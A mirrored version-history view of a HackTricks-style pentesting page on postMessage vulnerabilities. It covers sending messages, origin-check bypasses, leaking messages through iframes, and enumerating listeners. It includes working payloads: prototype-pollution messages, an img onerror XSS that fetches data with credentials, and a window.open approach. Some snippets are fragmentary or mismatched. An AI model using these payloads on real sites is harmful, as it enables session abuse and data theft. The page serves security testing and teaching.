Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

147 lines
7.3 KiB
Raw Normal View History

2020-12-17 14:13:28 +01:00
# PostMessage Vulnerabilities
2021-10-04 23:42:12 +02:00
## Send **PostMessage**
2021-01-07 13:57:52 +01:00
**PostMessage** uses the following function to send a message:
2021-10-04 23:42:12 +02:00
2021-01-07 13:57:52 +01:00
targetWindow.postMessage(message, targetOrigin, [transfer]);
2021-10-04 23:42:12 +02:00
# postMessage to current page
window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an iframe with id "idframe"
<iframe id="idframe" src="http://victim.com/"></iframe>
2021-10-04 23:42:12 +02:00
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an iframe via onload
<iframe src="https://victim.com/" onload="this.contentWindow.postMessage('<script>print()</script>','*')">
2021-10-04 23:42:12 +02:00
# postMessage to an URL
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
2021-01-07 13:57:52 +01:00
2021-11-30 17:46:07 +01:00
Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._\
2022-02-22 12:36:42 +01:00
\_\_In the **second scenario**, the **message can only be sent to that domain** (even if the origin of the window object is different).\
2021-11-30 17:46:07 +01:00
If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
2021-01-07 13:57:52 +01:00
2022-02-22 12:36:42 +01:00
### Attacking iframe & wilcard in **targetOrigin**
2021-01-07 13:57:52 +01:00
2021-11-30 17:46:07 +01:00
As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** (no `X-Frame-Header` protection) and that is **sending sensitive** message via **postMessage** using a **wildcard** (\*), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.\
Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
2021-01-07 13:57:52 +01:00
2021-10-04 23:42:12 +02:00
<iframe src="https://docs.google.com/document/ID" />
setTimeout(exp, 6000); //Wait 6s
//Try to change the origin of the iframe each 100ms
function exp(){
}, 100);
2021-01-07 13:57:52 +01:00
## addEventListener exploitation
**`addEventListener`** is the function used by JS to declare the function that is **expecting `postMessages`**.\
2021-10-04 23:42:12 +02:00
A code similar to the following one will be used:
2021-01-07 13:57:52 +01:00
window.addEventListener("message", (event) => {
if (event.origin !== "http://example.org:8080")
// ...
}, false);
2021-11-30 17:46:07 +01:00
Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information (like changing a password). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords (in this example).
2021-01-07 13:57:52 +01:00
### Enumeration
2021-11-30 17:46:07 +01:00
In order to **find event listeners** in the current page you can:
2022-01-31 15:51:03 +01:00
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
2021-11-30 17:46:07 +01:00
* **Execute** in the developer tools console: `getEventListeners(window)`
2022-04-27 14:34:57 +02:00
![](<../.gitbook/assets/image (618) (1) (1).png>)
2020-12-17 14:13:28 +01:00
2021-11-30 17:46:07 +01:00
* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
![](<../.gitbook/assets/image (617).png>)
2021-11-30 17:46:07 +01:00
* Use a **browser extension** like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
### addEventListener check origin bypasses
2020-12-17 14:13:28 +01:00
2022-02-22 12:36:42 +01:00
* If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`\\
2021-11-30 17:46:07 +01:00
* If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.\
2022-02-22 12:36:42 +01:00
In regular expression, **a dot (.) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.\\
2021-11-30 17:46:07 +01:00
* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it **overwrites properties** of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
2020-12-17 14:13:28 +01:00
// Expected to fail:
result = u({
message: "'\"<b>\\"
result.message // "&#39;&quot;&lt;b&gt;\"
// Bypassed:
result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
`File` object is perfect for this exploit as it has a read-only `name` property which is used by our template and will bypass `escapeHtml` function.
### X-Frame-Header bypass
2021-11-30 17:46:07 +01:00
In order to perform these attacks ideally you will be able to **put the victim web page** inside an `iframe`. But some headers like `X-Frame-Header` can **prevent** that **behaviour**.\
In those scenarios you can still use a less stealthy attack. You can open a new tab to the vulnerable web application and communicate with it:
var w=window.open("<url>")
setTimeout(function(){w.postMessage('text here','*');}, 2000);
### postMessage to Prototype Pollution and/or XSS
2021-11-30 17:46:07 +01:00
In scenarios where the data sent through `postMessage` is executed by JS, you can **iframe** the **page** and **exploit** the **prototype pollution/XSS** sending the exploit via `postMessage`.
2021-10-22 12:16:40 +02:00
A couple of **very good explained XSS though `postMessage`** can be found in [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
2021-10-05 00:23:21 +02:00
2021-11-30 17:46:07 +01:00
Example of an exploit to abuse **Prototype Pollution and then XSS** through a `postMessage` to an `iframe`:
<iframe id="idframe" src=""></iframe>
function get_code() {
document.getElementById('iframe_victim').contentWindow.postMessage('{"__proto__":{"editedbymod":{"username":"<img src=x onerror=\\\"fetch(\'\', {credentials: \'same-origin\'}).then(response => response.json()).then(data => {alert(data[\'result\'][0][\'code\']);})\\\" />"}}}','*');
document.getElementById('iframe_victim').contentWindow.postMessage(JSON.stringify("refresh"), '*');
setTimeout(get_code, 2000);
For **more information**:
2021-03-23 23:23:10 +01:00
2022-02-22 12:36:42 +01:00
* Link to page about [**prototype pollution**](deserialization/nodejs-proto-prototype-pollution/)
* Link to page about [**XSS**](xss-cross-site-scripting/)
* Link to page about [**client side prototype pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
2021-03-23 23:23:10 +01:00
## References
2021-03-23 23:23:10 +01:00
2021-10-22 12:16:40 +02:00
* [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
2022-02-22 12:36:42 +01:00
* To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)